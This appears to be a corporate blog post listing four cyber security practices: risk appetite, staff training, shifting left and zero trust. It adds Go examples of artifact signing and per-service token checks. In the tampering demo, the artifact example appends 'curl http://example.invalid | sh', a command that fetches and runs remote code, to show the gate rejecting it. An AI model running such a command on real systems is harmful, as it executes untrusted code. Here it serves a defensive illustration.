Mostafa Abdelmoez, Group Director of Security & Anti Fraud at SMG, shared four things any company should consider in its cyber security programme to keep its employees and customers safe.
1. Risk Appetite – How much risk can you chew?
Understanding your business and its biggest risk factors is crucial to deciding how much risk your organisation is willing to accept in the pursuit of value. Without that decision, cyber security efforts have no limits, no guidance and no immediate impact. It is almost impossible, or at least highly inefficient, to protect something if you do not understand its risks and weaknesses.
The fundamental mission of cyber security is to protect your organisation, but what does protection mean? It includes business continuity, preventing loss (monetary or otherwise) and increasing or preserving value for all stakeholders. So you have to understand these dependencies: how they are set up, what exactly you are trying to protect, from whom, and what the impact on the business would be. Once that risk assessment is done, you can get to work. Starting with an inventory of the data you hold, where it lives and who can access it usually proves to be a good first step.
2. Humans are the first line of Cyber Security defence
The narrative often centres on people as the weakest link when discussing responsibility for cyber security. We believe that to be quite untrue. Humans are the first line of defence for maintaining an organisation's cyber security. This underscores the importance of providing suitable training to all employees, tailored to their roles or functions within the organisation, and reinforcing it with internal events, competitions and rewards. Employees generally struggle to identify gaps in their own security knowledge, which makes proper training, presented in an understandable way, all the more important. It is your responsibility as an organisation to offer a good user experience when conveying information about cyber security, and whenever people interact with security controls at all.
3. Shifting Left – Integrate cyber security into the fabric!
Now onto the more technical aspects: monitoring your infrastructure, networks and products should be a no-brainer. You need to log, audit and generally be aware of blind spots, which you will only find if you monitor your systems comprehensively.
You have to integrate cyber security into day-to-day business operations. For example: scan and sign the code before it goes into production, and keep scanning after it has been deployed. Employ different types of security testing, such as security audits, bug bounty programmes and application scanning. This is often termed Shifting Left, meaning that security practices start at the outset, from design onward, rather than being bolted on before release. The earlier you integrate security, the cheaper it becomes and the more impact it has.
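As an added illustration of the "sign before production, check after deployment" idea above (this is example code written for this page, not SMG's pipeline): a build step hashes the artifact and signs the digest with a build key, the deployment gate fails closed unless the signature verifies under the trusted public key and the bytes still match, and a post-deployment check re-hashes what is actually running to catch tampering on the host. The artifact bytes, the manifest format and the key handling are assumptions for the demonstration; in a real pipeline the build key would live in a KMS or HSM, not in the process.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Manifest is what the build step produces alongside the artifact: the artifact's
// SHA-256 digest and an Ed25519 signature over (name, digest) from the build key.
// Format is an assumption made for this example.
type Manifest struct {
	Name   string
	Digest []byte // sha256 of the artifact bytes
	Sig    []byte // ed25519 signature over manifestMessage(Name, Digest)
}

// manifestMessage binds the name to the digest so a signed digest for one
// artifact cannot be replayed under another name.
func manifestMessage(name string, digest []byte) []byte {
	return append([]byte(name+"\n"), digest...)
}

// SignArtifact runs in CI after the build: hash the bytes and sign the digest.
func SignArtifact(name string, artifact []byte, buildKey ed25519.PrivateKey) Manifest {
	d := sha256.Sum256(artifact)
	return Manifest{Name: name, Digest: d[:], Sig: ed25519.Sign(buildKey, manifestMessage(name, d[:]))}
}

// VerifyBeforeDeploy is the deployment gate. It fails closed: a missing or wrong
// signature, or bytes that differ from the signed digest, rejects the deployment.
func VerifyBeforeDeploy(m Manifest, artifact []byte, trusted ed25519.PublicKey) error {
	if len(m.Sig) != ed25519.SignatureSize ||
		!ed25519.Verify(trusted, manifestMessage(m.Name, m.Digest), m.Sig) {
		return errors.New("manifest signature invalid: not produced by the trusted build")
	}
	d := sha256.Sum256(artifact)
	if !bytes.Equal(d[:], m.Digest) {
		return errors.New("artifact digest does not match signed manifest")
	}
	return nil
}

// CheckAfterDeploy is the "scan after it has been deployed" step for integrity:
// re-hash what is actually on the host and compare with the signed digest.
func CheckAfterDeploy(m Manifest, running []byte) bool {
	d := sha256.Sum256(running)
	return bytes.Equal(d[:], m.Digest)
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	// Constructed sample artifact for the demonstration.
	artifact := []byte("#!/bin/sh\necho 'release 1.2.3'\n")
	m := SignArtifact("app-1.2.3", artifact, priv)

	fmt.Println("clean deploy:", VerifyBeforeDeploy(m, artifact, pub))

	// Something modified the artifact between build and deploy.
	tampered := append(append([]byte{}, artifact...), []byte("curl http://example.invalid | sh\n")...)
	fmt.Println("tampered deploy:", VerifyBeforeDeploy(m, tampered, pub))

	// Post-deployment drift check on the running copy.
	fmt.Println("running copy intact:", CheckAfterDeploy(m, tampered))
}
```

The gate checks the signature before the digest, so an attacker who can replace both the artifact and its manifest still needs the build key; verifying only a checksum published next to the artifact would not give you that.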
4. Prevention – Trust nothing, verify everything!
So far we have mainly talked about monitoring, which gives you detection. Ideally we are after prevention, which starts with investing in Edge Security.
In its simplest form, Edge Security consists of a firewall and an authentication server. Nothing should pass this checkpoint unless it has been authenticated and authorised. However, even after passing, nothing should be trusted by default. Always verify everything.
Think of this approach as having a multitude of edges (or checkpoints) on the inside: every internal service re-checks identity and authorisation on each request instead of trusting the network it came from. Any organisation should invest heavily in identity and access management, for its employees and for its users. The experience should be seamless and should resist phishing, which attackers favour for its low-effort, high-impact nature and which has been the initial access vector in many recent high-profile breaches. Biometrics, FIDO (Fast IDentity Online) and hardware security keys are all options; FIDO2/WebAuthn credentials are phishing-resistant because they are bound to the site's origin, whereas one-time codes and push approvals can still be relayed by a phishing page. Choose the appropriate method for each user group. Each multi-factor authentication method has its own advantages, disadvantages and threat model, which brings us back to the first point.
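As an added example of "edges on the inside" (written for this page, not SMG's code): after the authentication server has verified a user, it issues a short-lived signed assertion for one specific service, and that service's own gate re-verifies the signature, audience, expiry and role on every request. Nothing about where the request came from on the network is consulted. The token format, the claim names and the role table are assumptions made for the demonstration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
	"time"
)

// Claims is the assertion the authentication server issues after a successful login.
// Field set is an assumption for this example.
type Claims struct {
	Subject  string   `json:"sub"`
	Audience string   `json:"aud"`   // the single service this token may be presented to
	Roles    []string `json:"roles"` // roles granted to the subject
	Expiry   int64    `json:"exp"`   // unix seconds
}

// Token is the signed form of Claims.
type Token struct {
	Payload []byte // JSON-encoded Claims
	Sig     []byte // ed25519 signature over Payload by the authentication server
}

// Issue is the authentication server's job: sign the claims with its private key.
func Issue(issuerKey ed25519.PrivateKey, c Claims) (Token, error) {
	p, err := json.Marshal(c)
	if err != nil {
		return Token{}, err
	}
	return Token{Payload: p, Sig: ed25519.Sign(issuerKey, p)}, nil
}

// Gate is one internal service's own checkpoint. Allowed maps an action to the
// roles permitted to perform it; anything not listed is denied.
type Gate struct {
	Service   string
	IssuerKey ed25519.PublicKey
	Allowed   map[string]map[string]bool
	Now       func() time.Time
}

// Authorize verifies the token from scratch on every call and returns the
// subject on success. Source IP or network zone is deliberately not an input.
func (g Gate) Authorize(tok Token, action string) (string, error) {
	if len(tok.Sig) != ed25519.SignatureSize || !ed25519.Verify(g.IssuerKey, tok.Payload, tok.Sig) {
		return "", errors.New("token signature invalid")
	}
	var c Claims
	if err := json.Unmarshal(tok.Payload, &c); err != nil {
		return "", fmt.Errorf("malformed claims: %w", err)
	}
	if c.Audience != g.Service {
		return "", fmt.Errorf("token issued for %q presented to %q", c.Audience, g.Service)
	}
	if !g.Now().Before(time.Unix(c.Expiry, 0)) {
		return "", errors.New("token expired")
	}
	for _, r := range c.Roles {
		if g.Allowed[action][r] {
			return c.Subject, nil
		}
	}
	return "", fmt.Errorf("%s is not permitted to %s on %s", c.Subject, action, g.Service)
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	now := time.Now()
	payments := Gate{Service: "payments", IssuerKey: pub, Now: func() time.Time { return now },
		Allowed: map[string]map[string]bool{"refund": {"finance": true}}}
	hr := Gate{Service: "hr", IssuerKey: pub, Now: func() time.Time { return now },
		Allowed: map[string]map[string]bool{"read-salary": {"hr-admin": true}}}

	tok, _ := Issue(priv, Claims{Subject: "alice", Audience: "payments",
		Roles: []string{"finance"}, Expiry: now.Add(5 * time.Minute).Unix()})

	fmt.Println(payments.Authorize(tok, "refund"))   // alice <nil>
	fmt.Println(hr.Authorize(tok, "read-salary"))    // rejected: wrong audience, no lateral reuse
	fmt.Println(payments.Authorize(tok, "close-ledger")) // rejected: action not in the policy
}
```

Because the audience is checked, a token stolen from one service cannot be replayed against another, and because every gate verifies independently, compromising one internal hop does not grant implicit trust at the next. The phishing-resistant login that produces the token in the first place is a separate control; this example only covers what happens after it.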
Following these four points can already make a big difference to your organisation's cyber security. Raising awareness is just as important, which is why we have also put together a list of four things anyone can do to improve their security online.
We thank Mostafa for putting together this list, and let’s keep cyber security a top priority for the whole year!